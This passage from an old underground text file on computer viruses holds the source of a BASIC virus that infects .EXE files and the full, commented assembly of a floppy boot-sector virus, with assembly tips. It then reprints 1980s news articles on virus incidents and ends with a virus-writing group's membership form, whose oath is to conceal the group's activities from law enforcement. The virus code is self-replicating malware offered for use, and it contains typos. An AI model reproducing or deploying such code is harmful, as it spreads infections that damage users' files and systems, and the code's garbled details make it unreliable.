DOESNT SUCK 40 REM ** NO KIDDING 50 ON ERROR GOTO 670 60 REM *** LENGHTVIR MUST BE SET ** 70 REM *** TO THE LENGHT TO THE ** 80 REM *** LINKED PROGRAM *** 90 LENGHTVIR=2641 100 VIRROOT$="BV3.EXE" 110 REM *** WRITE THE DIRECTORY IN THE FILE "INH" 130 SHELL "DIR *.EXE>INH" 140 REM ** OPEN "INH" FILE AND READ NAMES ** 150 OPEN "R",1,"INH",32000 160 GET #1,1 170 LINE INPUT#1,ORIGINAL$ 180 LINE INPUT#1,ORIGINAL$ 190 LINE INPUT#1,ORIGINAL$ 200 LINE INPUT#1,ORIGINAL$ 210 ON ERROR GOT 670 220 CLOSE#2 230 F=1:LINE INPUT#1,ORIGINAL$ 240 REM ** "%" IS THE MARKER OF THE BV3 250 REM ** "%" IN THE NAME MEANS 260 REM ** INFECTED COPY PRESENT 270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210 280 ORIGINAL$=MID$(ORIGINAL$,1,13) 290 EXTENSIONS$=MID$(ORIGINAL,9,13) 300 MID$(EXTENSIONS$,1,1)="." 310 REM *** CONCATENATE NAMES INTO FILENAMES ** 320 F=F+1 330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN GOTO 350 340 GOTO 320 350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$ 360 ON ERROR GOTO 210 365 TEST$="" 370 REM ++ OPEN FILE FOUND +++ 380 OPEN "R",2,OROGINAL$,LENGHTVIR 390 IF LOF(2) < LENGHTVIR THEN GOTO 420 400 GET #2,2 410 LINE INPUT#1,TEST$ 420 CLOSE#2 431 REM ++ CHECK IF PROGRAM IS ILL ++ 440 REM ++ "%" AT THE END OF THE FILE MEANS.. 450 REM ++ FILE IS ALREADY SICK ++ 460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210 470 CLOSE#1 480 ORIGINALS$=ORIGINAL$ 490 MID$(ORIGINALS$,1,1)="%" 499 REM ++++ SANE "HEALTHY" PROGRAM ++++ 510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$ 520 SHELL C$ 530 REM *** COPY VIRUS TO HEALTHY PROGRAM **** 540 C$="COPY "+VIRROOT$+ORIGINAL$ 550 SHELL C$ 560 REM *** APPEND VIRUS MARKER *** 570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13 580 WRITE#1,ORIGINALS$ 590 CLOSE#1 630 REM ++ OUYPUT MESSAGE ++ 640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!" 650 SYSTEM 660 REM ** VIRUS ERROR MESSAGE 670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM 680 END This basic virus will only attack .EXE files. After the execution you will see a "INH" file which contains the directory, and the file %SORT.EXE. Programs which start with "%" are NOT infected ,they pose as back up copies. ;[2.9] ;-----------------------------------------------------------------------; ; This virus is of the "FLOPPY ONLY" variety. ; ; It replicates to the boot sector of a floppy disk and when it gains control ; it will move itself to upper memory. It redirects the keyboard ; ; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; ; it will attempt to infect any floppy it finds in drive A:. ; ; It keeps the real boot sector at track 39, sector 8, head 0 ; ; It does not map this sector bad in the fat (unlike the Pakistani Brain) ; and should that area be used by a file, the virus ; ; will die. It also contains no anti detection mechanisms as does the ; ; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; ; sector 9 because this is common to all floppy formats both single ; ; sided and double sided. It does not contain any malevolent TROJAN ; ; HORSE code. It does appear to contain a count of how many times it ; ; has infected other diskettes although this is harmless and the count ; ; is never accessed. ; ; ; ; Things to note about this virus: ; ; It can not only live through an ALT-CTRL-DEL reboot command, but this ; ; is its primary (only for that matter) means of reproduction to other ; ; floppy diskettes. The only way to remove it from an infected system ; ; is to turn the machine off and reboot an uninfected copy of DOS. ; ; It is even resident when no floppy is booted but BASIC is loaded ; ; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; ; it activates and infectes the floppy from which the user is ; ; attempting to boot. ; ; ; ; Also note that because of the POP CS command to pass control to ; ; its self in upper memory, this virus does not to work on 80286 ; ; machines (because this is not a valid 80286 instruction). ; ; ; ; If your assembler will not allow the POP CS command to execute, replace; ; the POP CS command with an NOP and then assemble it, then debug that ; ; part of the code and place POP CS in place of NOP at that section. ; ; ; ; The Norton Utilities can be used to identify infected diskettes by ; ; looking at the boot sector and the DOS SYS utility can be used to ; ; remove it (unlike the Pakistani Brain). ; ;-----------------------------------------------------------------------; ; ORG 7C00H ; ; TOS LABEL WORD ;TOP OF STACK ;-----------------------------------------------------------------------; ; 1. Find top of memory and copy ourself up there. (keeping same offset); ; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; ; 3. Redirect int 9 (keyboard) to ourself in top of memory ; ; 4. Jump to ourself at top of memory ; ; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; ;-----------------------------------------------------------------------; BEGIN: CLI ;INITIALIZE STACK XOR AX,AX ; MOV SS,AX ; MOV SP,offset TOS ; STI ; ; MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) MOV DS,BX ; MOV AX,[0013H] ; MUL BX ; SUB AX,07E0H ; (7C00H+512)/16 MOV ES,AX ; ; PUSH CS ;DS = CS POP DS ; ; CMP DI,3456H ;IF THE VIRUS IS REBOOTING... JNE B_10 ; DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- ; B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY MOV DI,SI ; MOV CX,512 ; CLD ; REP MOVSB ; ; MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE MOV CX,128 ; REP MOVSB ; ; CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) ; PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH POP CS ; PUSH DS ;DS=0 ; ES = DS POP ES ; ; MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 MOV CX,2708H ; TRACK 40, SECTOR 8 MOV AX,0201H ; READ SECTOR INT 13H ; (common to 8/9 sect. 1/2 sided!) JB $ ; HANG IF ERROR ; JMP JMP_BOOT ;JMP 0000:7C00 ; ;-----------------------------------------------------------------------; ; SAVE THEN REDIRECT INT 9 VECTOR ; ; ; ; ON ENTRY: DS = 0 ; ; ES = WHERE TO SAVE OLD_09 & (HI) ; ; WHERE NEW_09 IS (HI) ; ;-----------------------------------------------------------------------; PUT_NEW_09: ; DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 ; MOV SI,9*4 ;COPY INT 9 VECTOR TO MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) MOV CX,0004 ; ; CLI ; REP MOVSB ; MOV Word Ptr [9*4],offset NEW_09 MOV [(9*4)+2],ES ; STI ; ; RET ; ; ;-----------------------------------------------------------------------; ; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; ;-----------------------------------------------------------------------; ACK_KEYBD: ; IN AL,61H ;RESET KEYBOARD THEN CONTINUE MOV AH,AL ; OR AL,80H ; OUT 61H,AL ; XCHG AL,AH ; OUT 61H,AL ; JMP RBOOT ; ; ;-----------------------------------------------------------------------; ; DATA AREA WHICH IS NOT USED IN THIS VERSION ; ; REASON UNKNOWN ; ;-----------------------------------------------------------------------; TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 DB 27H,0,2,2 ; (CURRENTLY NOT USED) DB 27H,0,3,2 ; DB 27H,0,4,2 ; DB 27H,0,5,2 ; DB 27H,0,6,2 ; DB 27H,0,7,2 ; DB 27H,0,8,2 ; ; ;A7C9A LABEL BYTE ; DW 00024H ;NOT USED DB 0ADH ; DB 07CH ; DB 0A3H ; DW 00026H ; ; ;L7CA1: ; POP CX ;NOT USED POP DI ; POP SI ; POP ES ; POP DS ; POP AX ; POPF ; JMP 1111:1111 ; ; ;-----------------------------------------------------------------------; ; IF ALT & CTRL & DEL THEN ... ; ; IF ALT & CTRL & ? THEN ... ; ;-----------------------------------------------------------------------; NEW_09: PUSHF ; STI ; ; PUSH AX ; PUSH BX ; PUSH DS ; ; PUSH CS ;DS=CS POP DS ; ; MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME IN AL,60H ;GET SCAN CODE MOV AH,AL ;SAVE IN AH AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH ; CMP AL,1DH ;IS IT A [CTRL]... JNE N09_10 ;...JUMP IF NO MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) JMP N09_30 ; ; N09_10: CMP AL,38H ;IS IT AN [ALT]... JNE N09_20 ;...JUMP IF NO MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) JMP N09_30 ; ; N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... JNE N09_30 ;...JUMP IF NO ; CMP AL,17H ;IF [I]... JE N09_X0 ;...JUMP IF YES CMP AL,53H ;IF [DEL]... JE ACK_KEYBD ;...JUMP IF YES ; N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME ; N09_90: POP DS ; POP BX ; POP AX ; POPF ; ; DB 0EAH ;JMP F000:E987 OLD_09 DW ? ; DW 0F000H ; ; N09_X0: JMP N09_X1 ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? MOV AX,0800H ;AL=0, AH=DELAY ARG OUT DX,AL ; CALL DELAY ; MOV [ALT_CTRL],AX ;AX=0 ; ; MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR INT 10H ; MOV AH,2 ;SET CURSOR POS 0,0 XOR DX,DX ; MOV BH,DH ; PAGE 0 INT 10H ; ; MOV AH,1 ;SET CURSOR TYPE MOV CX,0607H ; INT 10H ; ; MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) CALL DELAY ; ; CLI ; OUT 20H,AL ;SEND EOI TO INT CONTROLLER ; MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) MOV SI,offset BEGIN - 128 ; MOV CX,128 ; CLD ; REP MOVSB ; ; MOV DS,CX ;CX=0 ;DS=0 ; MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR MOV [(19H*4)+2],CS ; ; MOV AX,0040H ;DS = ROM DATA AREA MOV DS,AX ; ; MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) ; PUSH DS ;IF BIOS F000:E502 == 21E4... MOV AX,0F000H ; MOV DS,AX ; CMP Word Ptr [0E502H],21E4H ; POP DS ; JE R_90 ; INT 19H ; IF NOT...REBOOT ; R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! ; ;-----------------------------------------------------------------------; ; REBOOT INT VECTOR ; ;-----------------------------------------------------------------------; NEW_19: XOR AX,AX ; ; MOV DS,AX ;DS=0 MOV AX,[0410] ;AX=EQUIP FLAG TEST AL,1 ;IF FLOPPY DRIVES ... JNZ N19_20 ;...JUMP N19_10: PUSH CS ;ELSE ES=CS POP ES ; CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) INT 18H ;LOAD BASIC ; N19_20: MOV CX,0004 ;RETRY COUNT = 4 ; N19_22: PUSH CX ; MOV AH,00 ;RESET DISK INT 13 ; JB N19_81 ; MOV AX,0201 ;READ BOOT SECTOR PUSH DS ; POP ES ; MOV BX,offset BEGIN ; MOV CX,1 ;TRACK 0, SECTOR 1 INT 13H ; N19_81: POP CX ; JNB N19_90 ; LOOP N19_22 ; JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC ; ;-----------------------------------------------------------------------; ; Reinfection segment. ; ;-----------------------------------------------------------------------; N19_90: CMP DI,3456 ;IF NOT FLAG SET... JNZ RE_INFECT ;...RE INFECT ; JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR JMP 0000:7C00H ; ; ;-----------------------------------------------------------------------; ; Reinfection Segment. ; ;-----------------------------------------------------------------------; RE_INFECT: ; MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH MOV CX,00E6H ; OURSELF MOV DI,SI ; PUSH CS ; POP ES ; CLD ; REPE CMPSB ; JE RI_12 ;IF NOT EQUAL... ; INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) ; ;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; MOV BX,offset TABLE ;FORMAT INFO MOV DX,0000 ;DRIVE A: HEAD 0 MOV CH,40-1 ;TRACK 39 MOV AH,5 ;FORMAT JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! ; ; <<< NO EXECUTION PATH TO HERE >>> ; JB RI_80 ; ; ;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 MOV BX,offset BEGIN ;TRACK 40H MOV CL,8 ;SECTOR 8 MOV AX,0301H ;WRITE 1 SECTOR INT 13H ; ; PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) POP ES ; JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE ; MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! MOV AX,0301 ; INT 13H ; JB RI_80 ; IF ERROR...JUMP TO BOOT CODE ; RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... INT 19H ;...FLAG AND REBOOT ; RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) JMP JMP_BOOT ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS ; MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG MOV BX,0040H ; MOV DS,BX ; MOV [0072H],AX ; 0040:0072 = RESET FLAG JMP N09_90 ; ; ;-----------------------------------------------------------------------; ; DELAY ; ; ; ; ON ENTRY AH:CX = LOOP COUNT ; ;-----------------------------------------------------------------------; DELAY: SUB CX,CX ; D_01: LOOP $ ; SUB AH,1 ; JNZ D_01 ; RET ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; A7DF4 DB 27H,00H,8,2 COUNTER_1 DW 001CH ALT_CTRL DW 0 A7DFC DB 27H,0,8,2 [2.10] Virili In The News ------------------ This section deals with a large amount of stuff, basically, a bunch of viruses and stuff that have been in the newspapers and magazines cuz all of the damage they have done. Enjoy.... There's A Virus In My Software Mischief-makers at the computer are deliberately endangering data By Philip J. Hilts Washington Post Staff Writer The Washington Post Weekly Edition, Page #38. May 23-29, 1988. Tiny programs that are deliberately cause mischief are epidemic among computers and causing nervousness among those who monitor them. Since the first tests of the notion in 1983 that machines can catch and spread "information diseases," the computer world has reached the point at which as many as thirty instances of "computer virus" have been reported in the past year, affecting tens of thousands of U.S. computers alone. Such viruses have been found at the National Aeronautics and Space Administration, International Business Machines Corporation, the House of Representatives, at least six universities, several major computer networks such as Comp-u-serve and several businesses, including the world's largest computer-service company, the $4.4 billion Electronic Data Systems Corporation of Dallas, Texas. Written by malicious programmers, the viruses are sneaked into computer systems by piggybacking them on legitimate programs and messages. There, they may be passed along or instructed to wait until a prearranged moment to burst forth and destroy data. Hundreds of computers at the Hebrew University of Jerusalem and other places in Israel were hit last fall by a virus designed to spread and then, in one swipe on a Friday the thirteenth, destroy all data in any computer it could reach. If not for an error by it's author, who has not been caught, the virus could have caused devastation among micro-computers in Israel and other nations. The virus did not check to see whether it already had infected a program and so infected some computers hundreds of times, crowding their memories enough to call attention to itself. In a seven-month campaign, programmers in Israel hastened to find infected machines and ensure that the smallest number would be affected before Friday, May 13th. Officials say they initially thought that the infection was connected with the anniversary of the last day that Palestine existed as a political entity but subsequently decided that it most likely involved just Friday the thirteenth. Apparently, the campaign was successful; there has been no word of substantial damage. This past Friday the thirteenth is this year's only such day. At the Aldus Corporation of Seattle, Washington, a major software maker, executives are huddling with lawyers to try to determine whether international spread of such diseases is illegal. No virus cases have been taken to court. At N.A.S.A. headquarters in Washington, several hundred computers had to be resuscitated after being infected. N.A.S.A. officials have taken precautions and reminded their machines' users to follow routine computer hygiene: Don't trust foreign data or strange machines. Viruses have the eerie ability to perch disguised among legitimate data just as biological viruses hide among genes in human cells, then spring out unexpectedly, multiplying and causing damage. Experts say that even when they try to study viruses in controlled conditions, the programs can get out of control and erase everything in a computer. The viruses can be virtually impossible to stop if their creators are determined enough. "The only way to protect every-body from them is to do something much worse than the viruses: Stop talking to one another with computers," says William H. Murray, an information-security specialist at Ernst and Whinney financial consultants in Hartford, Connecticut. Hundreds of programs and files have been destroyed by viruses, and thousands of hours of repair or prevention time have been logged. Programmers have quickly produced antidote programs with such titles as "Vaccine," "Flu Shot," "Data Physician," "Syringe." Experts says known damage is minimal compared with the huge, destructive potential. They express the hope that the attacks will persuade computer users to minimize access to programming and data. "What we are dealing with here is the fabric of trust in society," says Murray. "With computer viruses, we have a big vulnerability." Early this year, Aldus Corporation discovered that a virus had been introduced that infected at least five-thousand copies of a new drawing program called Freehand for the Macintosh computer. The infected copies were packaged, sent to stores and sold. On March 2, the virus interrupted users by flashing this message on their screens: "Richard Brandow, publisher of MacMag, and its entire staff would like to take this opportunity to convey their universal message of peace to all Macintosh users around the world." Viruses are the newest of evolving methods of computer mayhem, says Donn B. Parker, a consultant at SRI International, a computer research firm in Menlo Park, California. One is the "Trojan horse," a program that looks and acts like a normal program but contains hidden commands that eventually take effect, ordering mischief. Others include the "time bomb," which explodes at a set time, and the "logic bomb," which goes off when the computer arrives at a certain result during normal computation. The "salami attack" executes barely noticeable results small acts, such as shaving a penny from thousands of accounts. The computer virus has the capability to command the computer to make copies of the virus and spread them. A virus typically is written only as a few hundred characters in a program containing tens of thousands of characters. When the computer reads legitimate instructions, it encounters the virus, which instructs the computer to suspend normal operations for a fraction of a second. During that time, the virus instructs the computer to check for other copies of itself and, if none is found, to make and hide copies. Instruction to commit damage may be included. A few infamous viruses found in the past year include: [] The "scores" virus. Named after a file it spawns, it recently entered several hundred Macintosh computers at N.A.S.A. headquarters. "It looks as if it searching for a particular Macintosh program with a name that no one recognizes," spokesman Charles Redmond says. This virus, still spreading, has reached computers in Congress' information system at the National Oceanic and Atmospheric Administration and at Apple Computer Incorporated's government-systems office in Reston, Virginia. It has hit individuals, businesses and computer "bulletin boards" where computer hobbyists share information. It apparently originated in Dallas, Texas and has caused damage, but seemingly only because of its clumsiness, not an instruction to do damage. [] The "brain" virus. Named by its authors, it was written by two brothers in a computer store in Lahore, Pakistan, who put their names, addresses and phone number in the virus. Like "scores," it has caused damage inadvertently, ordering the computer to copy itself into space that already contain information. [] The "Christmas" virus. It struck last December after a West German student sent friends a Christmas message through a local computer network. The virus told the receiver's computer to display the greeting, then secretly send the virus and message to everyone on the recipient's regular electronic mailing list. The student apparently had no idea that someone on the list had special, restricted access to a major world-wide network of several thousand computers run by I.B.M. The network broke down within hours when the message began multiplying, stuffing the computers' memories. No permanent damage was done, and I.B.M. says it has made repetition impossible. Demonstrations have shown that viruses can invade the screens of users with the highest security classification, according to Fred Cohen of Cincinnati, a researcher who coined the term "computer Viruses." A standard computer-protection device at intelligence agencies, he says, denies giving access by a person at one security level to files of anyone else at a higher level and allows reading but denies writing of files of anyone lower. This, however, "allows the least trusted user to write a program that can be used by everyone" and is "very dangerous," he says. Computers "are all at risk," says Cohen, "and will continue to be... not just from computer viruses. But the viruses represent a new level of threat because of their subtleness and persistence." 1.) Computer "viruses" are actually immature computer programs. Most are written by malicious programmers intent on destroying information in computers for fun. 2.) Those who write virus programs often conceal them on floppy disks that are inserted in the computer. The disks contain all programs needed to run the machine, such as word processing programs, drawing programs or spread sheet programs. 3.) A malicious programmer makes the disk available to others, saying it contains a useful program or game. These programs can be lent to others or put onto computerized: "bulletin boards" where anyone can copy them for personal use. 4.) A computer receiving the programs will "read" the disk and the tiny virus program at the same time. The virus may then order the computer to do a number of things: A.) Tell it to read the virus and follow instructions. B.) Tell it to make a copy of the virus and place it on any disk inserted in the machine today. C.) Tell it to check the computer's clock, and on a certain date destroy information that tells it where data is stored on any disk: if an operator has no way of retrieving information, it is destroyed. D.) Tell it not to list the virus programs when the computer is asked for an index of programs. 5.) In this way, the computer will copy the virus onto many disks--perhaps all or nearly all the disks used in the infected machine. The virus may also be passed over the telephone, when one computer sends or receives data from another. 6.) Ultimately hundreds or thousands of people may have infected disks and potential time bombs in their systems. ----------------------------------------------- 'Virus' infected hospital computers, led to epidemic of software mix-ups ----------------------------------------------- From the San Diego Tribune March 23, 1989 BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals last fall and disrupted patient diagnoses at two of the centers in what appears to be the first such invasion of a medical computer, it was reported yesterday. The infiltration did not harm any patients but delayed diagnoses by shutting down computers, creating files of non-existent patients and garbling names on patient records, which could have caused more serious problems, a doctor said. "It definitely did affect care in delaying things and it could have affected care in terms of losing this information completely," said Dr. Jack Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak, Mich., two of the hospitals involved. If patient information had been lost, the virus could have forced doctors to repeat tests that involve exposing patients to radiation, Juni said yesterday. The phony and garble files could have caused a mix-up in patient diagnosis, he said. "This was information we were using to base diagnoses on," said Juni, who reported the case in a letter in The New England Journal of Medicine. "We were lucky and caught it in time." A computer virus is a set of instructions designed to reproduce and spread from computer to computer. Some viruses do damage in the process, such as destroying files or overloading computers. Paul Pomes, a computer virus expert at the University of Illinois in Champaign, said this was the first case he had heard of in which a virus had disrupted a computer used for patient care or diagnosis in a hospital. Such disruptions could become more common as personal computers are used more widely in hospitals, Juni and Pomes said. More people know how to program -- and therefore sabotage -- personal computers than the more specialized computers that previously have been used, Pomes said. The problem in Michigan surfaced when a computer used to display images used to diagnose cancer and other diseases began to malfunction at the 250-bed Troy hospital in August 1988. In October, Juni discovered a virus in the computer in the Troy hospital. The next day, Juni found the same virus in a similar computer in the 1,200-bed Royal Oak facility, he said. The virus apparently arrived in a program in a storage disk that was part of the Troy computer system, he said. It probably was spread inadvertently to the Royal Oak computer on a floppy disk used by a resident who worked at both hospitals to write a research paper, he said. The virus also spread to the desk-top computers at the University of Michigan Medical Center in Ann Arbor, where it was discovered before it caused problems. "Prosecutor Wins Conviction In Computer Data Destruction" September 21, 1988 Fort Worth, Texas (AP) - A former programmer has been convicted of planting a computer "virus" in his employer's system that wiped out 168,000 records and was activated like a timb bomb, doing its damage two days after he was fired. Tarrant County Assistant District Attorney Davis McCown said he believes e is the first prosecutor in the country to have someone convicted for destroying computer records using a "virus." "We've had people stealing through computers, but not this type of case," McCown said. "The basis for this offense is deletion." "It's very rare that the people who spread the viruses are caught," said John McAfee, chairman of the Computer Virus Industry Association in Santa Clara, which helps educate the public about viruses and find ways to fight them. "This is absolutely the first time" for a conviction, McAfee said. "In the past, prosecutors have stayed away from this kind of case because they're too hard to prove," McCown said yesterday. They have also been reluctant because the victim doesn't want to let anyone know there has been a breach of security." Donald Gene Burleson, 40, was convicted of charges of harmful access to a computer, a third-degree feloy that carries up to 10 years in prison and up to $5,000 in fines. A key to the case was the fact that State District Judge John Bradshaw allowed the computer program that deleted the files to be introduced as evidence, McCown said. It would have been difficult to get a conviction otherwise, he said. The District Court jury deliberated six hours before bringing back the first conviction under the state's 3-year-old computer sabotage law. Burleson planted the virus in revenge for his firing from an insurance company, McCown said. Jurors were told during a technical and sometimes-complicated three-week trial that Burleson planted a rogue program in the computer system used to store records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm. A virus is a computer program, often hidden in apparently normal computer software, that instructs the computer to change or destroy information at a given time or after a certain sequence of commands. The virus, McCown said, was activated Sept. 21, 1985, two days after Burleson was fired as a computer programmer, because of alleged personality conflicts with other employees. "There were a series of programs built into the system as early as Labor Day (1985)," McCown said. "Once he got fired, those programs went off." The virus was discovered two days later, after it had eliminated 168,00 payroll records, holding up company paychecks for more than a month. The virus could have caused hundreds of thousands of dollars in damage to the system had it continued, McCown said.  WEST COAST CORRUPTED ALLEGIANCE PRESENTS: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- >> CORRUPTED PROGRAMMING INTERNATIONAL << >> MEMBERSHIP APPLICATION << -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (CPI is a sub-group of WCCA) NOTE: The following information is of a totally confidential nature. We must question you in depth and thouroughly so that our knowledge and idea of you will be quite complete. Remember, it is the fate of our voting members who will decide upon your membership, as the result of your response to this questionarre. Please answer the following completely and to the best of your ability. Also note that we may decide to voice validate you or gather any other information through other sources and will discover if you have placed false or misleading information on this application. PERSONAL INFORMATION: ----------------------------------------------------------------------------- Alias(es) You HAVE Used : Alias(es) You Currently Use : Your FULL REAL Name : Your Voice Phone Number :(###)###-#### Your Data Phone Number :(###)###-#### Your Mailing Address : Your City, State & Zip : Your Age : Occupation/Grade : Place of Employment/School : Work Phone Number : Your Interests And Hobbies : Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) : : Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, Data, Or Long Distance Type Of Company? If So, In What Way? : : COMPUTER INFORMATION/EXPERIENCE ----------------------------------------------------------------------------- Computer Experience (time) : Modeming Experience (time) : BBS's You Frequent (Name/#) : Some Elite References : Computers You Have Used : Computer(s) You Are Using : Computer You Prefer : Languages You Have Tried : Languages You Know Well : Your Best Language : Have You Ever Phreaked : Do You Phreak Regularly : Have You Ever Hacked : Do You Hack Regularly : Have You Ever Cracked : Do You Crack Regularly : Ever Made A Virus/Trojan : Major Accomplishments : : INTERVIEW ----------------------------------------------------------------------------- Answer In 4 Lines Or Less: What do you think Corrupted Programming International is? : : : : When did you first hear about CPI? : : : : Why do you want to be a member of CPI? : : : : Do you know any of the members of CPI? Can you name any or the founders of CPI? : : : : Have you considered the distribuition of Viruses/Trojans as a "crime"? Why or why not? Have you ever considered the consequences that could result from the acts of releasing a Virus/Trojan? (morally speaking?) : : : : Have you written any text files? (On any underground type of subject) : : : : Are you a member of any other group(s)? Can you name them and their HQ BBS? : : : : What would you consider yourself if you were admitted into CPI, a programmer, a phreaker, a distributor, a information gatherer, or a vegetable? : : : : Why would you ever want to release or aid in releasing a potential virus/trojan to the public? : : : : Can you contribute to CPI? How? :(do you have access to info concerning virus/trojans) :(exceptional programmer?) :(got connections?) :(anything extraordinary?) OATH ----------------------------------------------------------------------------- Typing your name at the bottom of the following paragraph is the same as signing your name on an official document. authorities - As stated in the document below, the term authorities shall be defined as any law enforcement agency or any agency that is/may be affiliated with any law enforcement agency. Also, this includes any company or agency or person which is/may be involved with the telephone company or any telephone-type of service(s). I [your name here] do solemnly swear never to report neither to my peers nor the authorities the actions and duties performed by this group, Corrupted Programming International, on any account. Also, I realize that if I leave CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold the greatest confidence of CPI's activities, and I agree that any information I may report to any one or any thing CANNOT be used against CPI and its members in a court of law. I fully understand that if I were to become affiliated with the authorities that it would be my duty to remove myself from any membership if my position presented itself as contradictory towards the group, CPI and its members. I also comprehend that if I were to be confronted by the authorities, it my duty as a CPI member, as signed below, is to never disclose or discuss CPI's activities to them; however, if I do, I fully agree that the information disclosed or discussed cannot then be used against CPI or any member(s) of CPI in a court of law. I further agree that all the terms and restrictions as noted above also correspond to the entire group of WCCA, West Coast Corrupted Allegiance. Typed:____________________ ----------------------------------------------------------------------------- .Answer Each Question To The Best And Fullest Of Your Ability. ----------------------------------------------------------------------------- Upload ALL Applications To The WCCA Headquarters BBS T H E A N D R O M E D A S T R A I N Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then